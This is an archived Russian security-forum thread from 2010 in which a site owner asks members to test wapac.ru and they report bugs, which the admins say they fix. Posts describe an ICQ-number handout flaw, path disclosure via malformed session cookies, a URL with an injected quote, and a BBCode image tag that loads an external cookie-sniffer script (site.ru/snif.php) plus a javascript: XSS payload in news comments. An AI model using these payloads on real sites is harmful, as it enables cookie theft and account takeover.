ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Проверка на уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Проверка на уязвимости !
  #1  
Старый 17.04.2010, 16:13
materfaker
Новичок
Регистрация: 17.04.2010
Сообщений: 3
Провел на форуме:
10155

Репутация: 0
Thumbs up Проверка на уязвимости !

Прошу проверить античат на уязвимость сайт http://wapac.ru буду очень благодарен!Щас установилю гифку античата
 

  #2  
Старый 18.04.2010, 17:58
materfaker
Новичок
Регистрация: 17.04.2010
Сообщений: 3
Провел на форуме:
10155

Репутация: 0
По умолчанию

Регистрации на сайте нету...
 

  #3  
Старый 18.04.2010, 19:36
napas_hd
Познающий
Регистрация: 29.12.2008
Сообщений: 39
Провел на форуме:
1119456

Репутация: 8
По умолчанию

Назови нормально тему.

Нашел пару багов в раздаче ICQ:
На один и тот же емейл можно выслать сколько угодно номеров, надо всего лишь поставить пробел после эмейла (соответственно чтобы выслать 3й уин, необходимо поставить три пробела.

Можно получить чужие аськи, уже высланные. Вот пример http://wapac.ru/geticq/get1250
 

  #4  
Старый 18.04.2010, 19:42
materfaker
Новичок
Регистрация: 17.04.2010
Сообщений: 3
Провел на форуме:
10155

Репутация: 0
По умолчанию

второй баг исправил .... ща со 2 разберусь
 

  #5  
Старый 18.04.2010, 19:48
z-kzn-z
Новичок
Регистрация: 17.04.2010
Сообщений: 15
Провел на форуме:
48171

Репутация: 3
Отправить сообщение для z-kzn-z с помощью ICQ
По умолчанию

napas_hd, насчет подставить пробелы - не понял.. куда именно подставить, в поле email?
подставил, не дает. там пробелы trim()-ом режутся
P.S. я соадмин
 

  #6  
Старый 18.04.2010, 20:14
W@r.N0i$e
Участник форума
Регистрация: 02.06.2009
Сообщений: 143
Провел на форуме:
343507

Репутация: 114
По умолчанию

Раскрытие путей:
Добавляем к сессии с помощью любого редактора кукисов "лишние" символы и получаем:
Код:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/[path]/init.php on line 19

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /var/[path]/init.php:19) in /var/[path]/init.php on line 19

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /var/[path]/init.php:19) in /var/[path]/init.php on line 19

Warning: Cannot modify header information - headers already sent by (output started at /var/[path]/init.php:19) in /var/[path]/init.php on line 50
P.S. Товарищи. Ей богу. Надоело уже тыкать носом в банальные уязвимости, которые повторяет каждый первый пользователь ачата, который просит проверить сайт на баги. Считаю, что будет лучше почитать предыдущие посты в разделе и ознакомится с недочетами других пользователей, чтобы не допускать их ошибок. И желательно это сделать перед тем, как просить проверить свой сайт.
 

  #7  
Старый 18.04.2010, 20:25
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Можно прикрутить снифер в новостях в коментах
PHP код:
[_img]http://site.ru/snif.php[/_img] 
]
XSS там же
PHP код:
[_img]javascript:alert()[/_img

Последний раз редактировалось SeNaP; 18.04.2010 в 20:34..
 

  #8  
Старый 18.04.2010, 20:28
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

http://wapac.ru/videos.php?mode=video&'id_video=165
 

  #9  
Старый 18.04.2010, 23:47
z-kzn-z
Новичок
Регистрация: 17.04.2010
Сообщений: 15
Провел на форуме:
48171

Репутация: 3
Отправить сообщение для z-kzn-z с помощью ICQ
По умолчанию

Спасибо! пофиксил.
извиняюсь за временное отключение апача на несколько часов, были проблемы, пришлось отключить.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ